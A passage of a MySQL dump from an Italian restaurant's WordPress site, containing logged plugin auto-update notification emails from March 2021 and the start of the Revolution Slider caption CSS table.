05:52:43','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-16/',0,'postman_sent_mail','',0),(4631,0,'2021-03-04 17:52:13','2021-03-04 16:52:13','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Yoast SEO (da versione 15.9 a 15.9.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-17','','','2021-03-04 17:52:13','2021-03-04 16:52:13','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-17/',0,'postman_sent_mail','',0),(4632,0,'2021-03-08 15:06:00','2021-03-08 14:06:00','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.3.18 a 2.4.0)\n- Really Simple SSL (da versione 4.0.9 a 4.0.10)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-18','','','2021-03-08 15:06:00','2021-03-08 14:06:00','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-18/',0,'postman_sent_mail','',0),(4633,0,'2021-03-09 13:49:54','2021-03-09 12:49:54','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.10 a 4.0.11)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-19','','','2021-03-09 13:49:54','2021-03-09 12:49:54','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-19/',0,'postman_sent_mail','',0),(4634,0,'2021-03-10 01:26:26','2021-03-10 00:26:26','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.76 a 3.77)\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.47 a 1.16.48)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-20','','','2021-03-10 01:26:26','2021-03-10 00:26:26','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-20/',0,'postman_sent_mail','',0),(4635,0,'2021-03-10 19:16:59','2021-03-10 18:16:59','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Content Views (da versione 2.3.4 a 2.4.0)\n- Popup Builder (da versione 3.77 a 3.78)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-21','','','2021-03-10 19:16:59','2021-03-10 18:16:59','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-21/',0,'postman_sent_mail','',0),(4636,0,'2021-03-11 14:42:00','2021-03-11 13:42:00','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Content Views (da versione 2.4.0 a 2.4.0.1)\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.48 a 1.16.49)\n- Yoast SEO (da versione 15.9.1 a 15.9.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-22','','','2021-03-11 14:42:00','2021-03-11 13:42:00','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-22/',0,'postman_sent_mail','',0),(4637,0,'2021-03-13 02:21:05','2021-03-13 01:21:05','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.0 a 2.4.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-23','','','2021-03-13 02:21:05','2021-03-13 01:21:05','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-23/',0,'postman_sent_mail','',0),(4638,0,'2021-03-15 02:27:54','2021-03-15 01:27:54','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.5 a 0.9.1.6)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-24','','','2021-03-15 02:27:54','2021-03-15 01:27:54','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-24/',0,'postman_sent_mail','',0),(4639,0,'2021-03-16 13:27:19','2021-03-16 12:27:19','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.6 a 3.1.7)\n- Yoast SEO (da versione 15.9.2 a 16.0)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-25','','','2021-03-16 13:27:19','2021-03-16 12:27:19','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-25/',0,'postman_sent_mail','',0),(4640,0,'2021-03-17 01:34:37','2021-03-17 00:34:37','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.49 a 1.16.50)\n- Yoast SEO (da versione 16.0 a 16.0.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-26','','','2021-03-17 01:34:37','2021-03-17 00:34:37','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-26/',0,'postman_sent_mail','',0),(4641,0,'2021-03-17 13:44:29','2021-03-17 12:44:29','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Direct Checkout for WooCommerce (da versione 2.4.3 a 2.4.5)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-27','','','2021-03-17 13:44:29','2021-03-17 12:44:29','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-27/',0,'postman_sent_mail','',0),(4642,0,'2021-03-18 14:23:19','2021-03-18 13:23:19','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Sydney Toolbox (da versione 1.14 a 1.15)\n- Yoast SEO (da versione 16.0.1 a 16.0.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-28','','','2021-03-18 14:23:19','2021-03-18 13:23:19','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-28/',0,'postman_sent_mail','',0),(4643,0,'2021-03-20 01:32:08','2021-03-20 00:32:08','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8.2 a 2.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-29','','','2021-03-20 01:32:08','2021-03-20 00:32:08','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-29/',0,'postman_sent_mail','',0),(4644,0,'2021-03-22 13:44:19','2021-03-22 12:44:19','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.1 a 2.4.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-30','','','2021-03-22 13:44:19','2021-03-22 12:44:19','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-30/',0,'postman_sent_mail','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_css`
--

DROP TABLE IF EXISTS `wp_revslider_css`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_css` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext,
  `hover` longtext,
  `params` longtext NOT NULL,
  `advanced` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=110 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_css`
--

LOCK TABLES `wp_revslider_css` WRITE;
/*!40000 ALTER TABLE `wp_revslider_css` DISABLE KEYS */;
INSERT INTO `wp_revslider_css` VALUES (1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}'),(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}'),(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}'),(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}'),(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}'),(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}'),(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','[]','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}'),(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','[]','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}'),(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}'),(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}'),(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}'),(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}'),(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}'),(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}','{\"idle\":[],\"hover\":\"\"}'),(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 